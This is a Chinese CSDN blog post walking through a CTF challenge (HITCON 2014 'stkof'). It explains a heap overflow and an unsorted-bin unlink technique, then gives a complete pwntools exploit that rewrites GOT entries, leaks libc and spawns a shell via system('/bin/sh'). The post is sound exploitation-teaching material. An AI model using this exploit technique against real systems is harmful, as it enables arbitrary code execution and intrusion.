hitcon2014_stkof

最新推荐文章于 2024-01-28 08:16:53 发布
最新推荐文章于 2024-01-28 08:16:53 发布
阅读量135 收藏 1
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53062301/article/details/119237738
版权

一道unsortedbin unlink,题目具有三个功能malloc,free,edit,具有漏洞是edit的大小没有进行检查,所以就可以造成栈溢出,又因为没有开PIE,所以可以用unlink来做这道题,unlink就是可以伪造fake_chunk,使fd=p-0x18,bk=p-0x10,并且覆盖下一个chunk的PREV_INUSE位,然后free掉下一个堆块,在unlink过程中这个chunk会和下一个chunk合并,这个时候edit本chunk就可以将内容写至p-0x18的位置,从而实现任意地址写。

先申请四个堆块

add(0x80)
add(0x30)
add(0x80)
add(0x80)

看一下堆布局

Allocated chunk | PREV_INUSE
Addr: 0x2022000
Size: 0x1011
​
Allocated chunk | PREV_INUSE
Addr: 0x2023010
Size: 0x91
​
Allocated chunk | PREV_INUSE
Addr: 0x20230a0
Size: 0x411
​
Allocated chunk | PREV_INUSE
Addr: 0x20234b0
Size: 0x41
​
Allocated chunk | PREV_INUSE
Addr: 0x20234f0
Size: 0x91
​
Allocated chunk | PREV_INUSE
Addr: 0x2023580
Size: 0x91
​
Top chunk | PREV_INUSE
Addr: 0x2023610
Size: 0x209f1

第一个chunk是系统为缓冲区申请的chunk,可以看到我们要伪造的chunk是申请的第二个chunk,但是第一个chunk和第二个chunk之间还有一个chunk,并且chunk指针首地址为0x0602140,所以我们要伪造的chunk的指针p是0x0602150,然后就是伪造chunk

FD = ptr - 0x18
BK = ptr - 0x10
payload1 = p64(0)   +  p64(0x31) + p64(FD) + p64(BK) + 'a' * 16 +  p64(0x30)     +       p64(0x90)
#          PREV_INUSE  SIZE位      fd指针     bk指针     用户输入区  下一个chunk的PREV_INUSE  下一个chunk的size
edit(2,0x40,payload1)
free(3)

由于第二个chunk地址为0x20234b0,所以我们伪造的chunk地址就是0x20234b0,之后free掉3号chunk就会与我们伪造的chunk合并,产生unlink

payload2 = p64(0) + p64(atoi_got) + p64(puts_got) + p64(free_got)
edit(2,len(payload2),payload2)
payload3 = p64(puts_plt)
edit(2,len(payload3),payload3)
free(1)

p指针0x0602150,0x0602150-0x18=0x602138,chunk指针首地址为0x602140,所以需要填充八个字节就开始写1号chunk指针位,这里将1号chunk位置填写位atoi的got表地址,然后将atoi的got表改写为puts的plt表,这样就可以把puts函数真实地址打印出来。

puts_addr = u64(ru("\x7f")[-6:].ljust(8,'\x00'))
print(hex(puts_addr))
sys_addr = puts_addr - libc.symbols["puts"] + libc.symbols["system"]
bin_sh_addr = libc.search("/bin/sh").next()
edit(0,0x8,p64(sys_addr))
sd(p64(bin_sh_addr))
a.interactive()

最后再根据偏移算出libc中system函数地址和/bin/sh地址从而get shell

完整exp

from pwn import *
from LibcSearcher import *
from struct import pack 
context(log_level="debug",os="linux",arch="amd64")

sd = lambda x:a.send(x)
sl = lambda x:a.sendline(x)
ru = lambda x:a.recvuntil(x)
rl = lambda :a.recvline()
ra = lambda :a.recv()
rn = lambda x:a.recv(x)
sla = lambda x,y:a.sendlineafter(x,y)

local = 'stkof'
a = process(local)
libc = ELF("libc-2.23.so")
#a = remote("node4.buuoj.cn",26690)
elf = ELF(local)
def add(size):
    sl('1')
    sl(str(size))
    ru('OK\n')

def edit(idx, size, content):
    sl('2')
    sl(str(idx))
    sl(str(size))
    sd(content)
    ru('OK\n')

def free(idx):
    sl('3')
    sl(str(idx))

ptr = 0x602150
atoi_got = elf.got["atoi"]
free_got = elf.got["free"]
puts_plt = elf.plt["puts"]
puts_got = elf.got["puts"]
add(0x80)
add(0x30)
add(0x80)
add(0x80)
FD = ptr - 0x18
BK = ptr - 0x10
payload1 = p64(0) + p64(0x31) + p64(FD) + p64(BK) + 'a' * 16 + p64(0x30) + p64(0x90)
edit(2,0x40,payload1)
free(3)
payload2 = p64(0) + p64(atoi_got) + p64(puts_got) + p64(free_got)
edit(2,len(payload2),payload2)
payload3 = p64(puts_plt)
edit(2,len(payload3),payload3)
free(1)

puts_addr = u64(ru("\x7f")[-6:].ljust(8,'\x00'))
print(hex(puts_addr))
sys_addr = puts_addr - libc.symbols["puts"] + libc.symbols["system"]
bin_sh_addr = libc.search("/bin/sh").next()
edit(0,0x8,p64(sys_addr))
sd(p64(bin_sh_addr))
a.interactive()

Aslhs_0
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
2014 HITCON stkof writeup
Morphy_Amo的博客
01-24 2077
文章目录writeup 题目链接 1、查看安全策略 root@kali:~/ctf/Other/pwn/heap# checksec stkof [*] '/root/ctf/Other/pwn/heap/stkof' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) 可以看
2014 HITCON stkof 的 exp
哒君的博客
07-23 503
思路借鉴于ctf-wiki,但ctf-wiki之中的思路较简略,且exp有一点疏忽的地方,故在此记录
2014_hitcon_stkof
Maxmalloc的博客
12-13 855
题目链接 这是一道unlink的题,初学者可以通过它入门unlink 先大概了解一下unlink相关的知识点 unlink主要适用于small chunk(>=size>=0x80)和large chunk
hitcon_2014_stkof详解
像初雪一样自由洒落
04-20 1673
本文主要列出hitcon2014_stkof的详细过程 主要参考:unlink 系列 程序流程 allocate:分配一个指定size大小的块,返回idx。 其中块的指针信息保存在一个全局变量0x602140中 fill:根据idx找到对应的块,重新给定大小size,读入内容content free:释放idx的块 漏洞分析 由于fill时候的size可以重新制定,可以造成堆溢出。 没有打印函数 有一个全局变量 方法:unlink unlink,控制全局变量内容 修改chunk1指.
信息安全_数据安全_HITCON_Badge_2019_秘辛:MCU_ARM_Tru.pdf
08-22
【标题】"信息安全_数据安全_HITCON_Badge_2019_秘辛:MCU_ARM_Tru.pdf" 涉及的是2019年HITCON活动的安全挑战,重点在于利用ARM TrustZone技术在微控制器(MCU)上的应用,特别是与数据安全和信息安全建设相关的内容...
信息安全_数据安全_HITCON_GIRLS_成果分享與_CyberSec_week.pdf
08-22
HITCON GIRLS是一个以女性为主体的信息安全社区,致力于推广信息安全学习和提升科技行业的包容性。 【HITCON GIRLS】 HITCON GIRLS社区通过组织各种主题的读书会,鼓励女性成员深入学习信息安全知识和技术,促进...
HITCON CTF 2017
11-08
HITCON CTF 2017 所有题目整理...............................................................................................................................................................................
HITCON-Badge:HITCON徽章相关文件
04-29
HITCON徽章 (非常)HITCON 2017电子徽章的简单手册。 概述 HITCON 2017电子徽章(HEB)基于联发科技MT7697 SoC。 您可以使用microUSB代替电池! 除非您不知道如何恢复它,或者不再希望参加CTF,否则请不要刷新您的...
HITCON-Training-Writeup:https的简要说明
04-29
HITCON培训 我为做了简短的 有关Linux二进制开发的信息,请参见。 环境设定 git clone https://github.com/scwuaptx/HITCON-Training.git ~/ cd HITCON-Training && chmod u+x ./env_setup.sh && ./env_setup.sh ...
[BUUCTF]PWN——hitcon2014_stkof
mcmuyanga的博客
01-18 793
hitcon2014_stkof 附件 步骤: 例行检查,64位程序,开启了canary和nx 本地试运行一下看看大概的情况, 64位ida载入,给程序的函数改了一下名,方便看,这是道堆,不过没有打印菜单 main(),v3=4的那个函数感觉没什么用,就不截图了 add() del() edit() 利用点在edit() 它向存储在s[v2]的这个数组中的指针开始的地址读入n数个字符(n由我们输入,可以溢出),也就是说,只要我们能够修改s[v2]中存的指针,就可以实现任意地址写。程序没有开启r
hitcon2014_stkof(unsorted bin unlink)
seaaseesa的博客
04-09 821
hitcon2014_stkof 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,edit功能存在溢出。 程序没有show功能。 由于没有开启PIE,got表也可以修改,因此,我们利用unlink控制堆指针为got表,然后修改strlen的got表为puts的plt表,即可实现show的功能,进而泄露glibc地址,后续利用。 #coding:utf8 from ...
2014 HITCON——stkof
04-20 224
64位程序,没开PIE  #unlink 程序逻辑 1 __int64 __fastcall main(__int64 a1, char **a2, char **a3) 2 { 3 int v3; // eax 4 signed int v5; // [rsp+Ch] [rbp-74h] 5 char nptr; // [rsp+10h] [r...
[BUUCTF]-PWN:hitcon2014_stkof解析(unlink)
2301_79326813的博客
01-28 756
又是一道堆题,先看保护关键信息,64位,没开pie。再看ida大致就是alloc创建堆块,free释放堆块,fill填充堆块内容,以及一个看起来没啥用的函数,当然我也没利用这个函数去解题这里有两种解法。
HITCON 2014 pwn - stkof 做题笔记
fa1c4的blog
08-30 463
前言 一道unlink + off-by-one, ctfhub 搜 stkof 分析过程 __int64 __fastcall main(int a1, char **a2, char **a3) { int v3; // eax int v5; // [rsp+Ch] [rbp-74h] char nptr[104]; // [rsp+10h] [rbp-70h] BYREF unsigned __int64 v7; // [rsp+78h] [rbp-8h] v7 = __re
探索算法迷宫:揭秘寻找最短路径的神兵利器
最新发布
08-19
数据结构是计算机科学中的一个基本概念,它指的是数据的组织、管理和存储方式,以及对数据的操作。数据结构使得数据的访问和修改更加高效和有序。常见的数据结构包括: 1. **数组**(Array):一种线性数据结构,可以存储相同类型的元素,并通过索引访问。 2. **链表**(Linked List):一种线性数据结构,由一系列节点组成,每个节点包含数据部分和指向下一个节点的指针。 3. **栈**(Stack):一种后进先出(LIFO, Last In First Out)的数据结构,只能在一端进行添加或删除操作。 4. **队列**(Queue):一种先进先出(FIFO, First In First Out)的数据结构,允许在一端添加元素,在另一端删除元素。 5. **哈希表**(Hash Table):通过键值对存储数据的数据结构,可以快速地通过键来访问数据。 6. **树**(Tree):一种层次结构的数据结构,每个节点有零个或多个子节点,通常用于表示具有层次关系的数据。 7. **图**(Graph):由顶点(节点)和边组成,可以表示复杂的关系和网络结构。 每种数据结构都有其
[hitcon 2017]ssrfme 1
04-11
这道题目是一个SSRF漏洞题目。SSRF全称为Server Side Request Forgery,是一种常见的Web安全漏洞。当存在SSRF漏洞时,攻击者可以将服务器作为代理,进而访问在内部网络中无法访问的资源,如内部Web应用、数据库等。此题的目标是通过一个输入参数包含的URL,探测出内部的flag并输出。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Aslhs_0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值